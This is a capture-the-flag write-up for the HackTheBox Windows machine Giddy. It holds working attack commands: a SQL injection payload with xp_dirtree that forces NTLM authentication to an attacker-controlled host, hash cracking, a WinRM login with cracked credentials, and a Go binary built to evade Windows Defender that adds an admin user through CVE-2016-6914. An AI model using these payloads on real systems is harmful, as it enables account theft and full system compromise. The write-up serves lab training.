HTB: Giddy

SQL injection doesn’t always mean dumping a database. Sometimes it just means coaxing the server into making a network connection it shouldn’t - and that’s enough to steal credentials. Giddy is a great example of that, paired with a creative privesc that requires bypassing Windows Defender with a custom payload.

Machine Info

Field	Details
Name	Giddy
Platform	HackTheBox
OS	Windows
Difficulty	Medium
IP	10.129.96.140

TL;DR

ASP.NET MVC app has a search endpoint vulnerable to SQL injection. We use xp_dirtree to force the SQL Server to authenticate outbound to our Responder instance, capturing Stacy’s NTLMv2 hash. After cracking it, Evil-WinRM gives us a shell. On the machine we find a unifivideo folder hinting at CVE-2016-6914 - Ubiquiti UniFi Video’s service hijacks taskkill.exe on stop. Defender blocks msfvenom, so we cross-compile a custom Go payload to add a local admin user and RDP in as root.

Recon

nmap scan showing ports 80, 443, 3389, and 5985 open on the target

Ports 80 (HTTP), 443 (HTTPS), 3389 (RDP), and 5985 (WinRM). Standard Windows web server setup. Let’s see what’s on port 80.

Enumeration

IIS default page showing a happy dog hanging out a car window

A cheerful dog. Not exactly a clue, but the IIS server is confirmed. Time to find actual content.

gobuster directory scan finding /aspnet_client, /remote, /mvc, and /aspnet_Client paths

1
gobuster dir -u http://10.129.96.140/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -b 404 -t 25

/mvc jumps out. That’s an ASP.NET MVC application - likely more attack surface than a static page.

ASP.NET MVC application search page at /mvc/Search.aspx

There’s a product search form at /mvc/Search.aspx. Any time I see a search field backed by a database, the first thing I try is a single quote.

Foothold

SQL Injection

Sending ' in the search field breaks the query immediately: “Unclosed quotation mark after the character string. Incorrect syntax near.” That’s raw SQL Server error output - verbose errors are on, and the input goes straight into the query unsanitized.

Now, instead of dumping tables, there’s a more interesting trick available in SQL Server: xp_dirtree. It’s a stored procedure that lists directory contents - but more usefully, it can trigger an outbound SMB connection to a UNC path. When the server tries to connect to our machine over SMB, Windows will attempt to authenticate using NTLMv2. If we’re listening with Responder, we catch the hash.

The payload:

1
'; EXEC master..xp_dirtree '\\10.10.14.2\share'--

Responder tool starting up and listening on tun0 interface for NTLM authentication requests

1
sudo responder -I tun0 -v

Responder capturing Stacy's NTLMv2 hash after the SQL Server made an outbound SMB connection

Stacy’s NTLMv2 hash comes right in. The SQL Server service is running as a domain user (GIDDY\Stacy) and happily authenticated to our fake share.

john cracking Stacy's NTLMv2 hash with rockyou.txt, finding the password xNnWo6272k7x

1
john hash --wordlist=/usr/share/wordlists/rockyou.txt

Password: xNnWo6272k7x. WinRM is open, let’s use it.

Evil-WinRM shell as Stacy showing Documents directory with query and unifivideo files

1
evil-winrm -u stacy -p 'xNnWo6272k7x' -i 10.129.96.140

We’re in as Stacy. Looking at her Documents folder, there’s a file called unifivideo - that’s a hint at what’s installed on this machine.

Privilege Escalation

CVE-2016-6914 - Ubiquiti UniFi Video

CVE-2016-6914 is a local privilege escalation in Ubiquiti UniFi Video 3.7.3. The service runs as SYSTEM and when it stops, it calls taskkill.exe - but it searches the current working directory (C:\ProgramData\unifi-video\) before %SystemRoot%\System32. If we drop a malicious taskkill.exe there, the service will execute it as SYSTEM.

The obvious move is to use msfvenom for a reverse shell payload, but Windows Defender on this box blocks standard msfvenom output. Time to get creative.

Custom Go Payload

Instead of a reverse shell, we just need code execution as SYSTEM. Adding a local admin user is simpler and Defender has no signature for a custom-compiled Go binary:

1
2
3
4
5
6
7
8
package main

import "os/exec"

func main() {
    cmd := exec.Command("cmd", "/c", "net user hacker P@ssw0rd123! /add && net localgroup administrators hacker /add")
    cmd.Run()
}

Cross-compiled for Windows:

1
GOOS=windows GOARCH=amd64 go build -o taskkill.exe taskkill.go

With our SMB server running, we copy the payload over and trigger the service restart:

1
2
3
copy \\10.10.14.2\share\taskkill.exe C:\ProgramData\unifi-video\taskkill.exe
Stop-Service "Ubiquiti UniFi Video" -Force
Start-Service "Ubiquiti UniFi Video"

The service stops, calls taskkill.exe, finds ours first, and runs it as SYSTEM. User hacker is now a local admin.

nxc RDP confirming hacker:P@ssw0rd123 credentials work on the target with Pwnd confirmation

1
nxc rdp 10.129.96.140 -u hacker -p 'P@ssw0rd123'

xfreerdp RDP session as hacker showing root.txt open in Notepad with the flag

1
xfreerdp3 /u:hacker /p:'P@ssw0rd123' /v:10.129.96.140 /cert:ignore

Root flag in Notepad. Done.

Takeaways

SQL injection doesn’t need to read data to be dangerous. Forcing outbound NTLM authentication via xp_dirtree is a powerful technique - the attacker never touches a single table, but still compromises an account. Always consider what stored procedures are enabled on the SQL Server.

AV bypass with custom compiled payloads. When msfvenom gets caught, think about what your payload actually needs to do. Adding a user requires a single cmd /c net user call - trivial to implement in any language, and Defender has no signature for it if you compile it yourself.

Search the working directory before System32. The UniFi Video bug is a classic DLL/binary hijacking pattern. Services that resolve executables from their own directory before %PATH% are a persistent source of local privescs. Always check what the service working directory is and who can write there.

Machine Info#

TL;DR#

Recon#

Enumeration#

Foothold#

Privilege Escalation#

Takeaways#

References#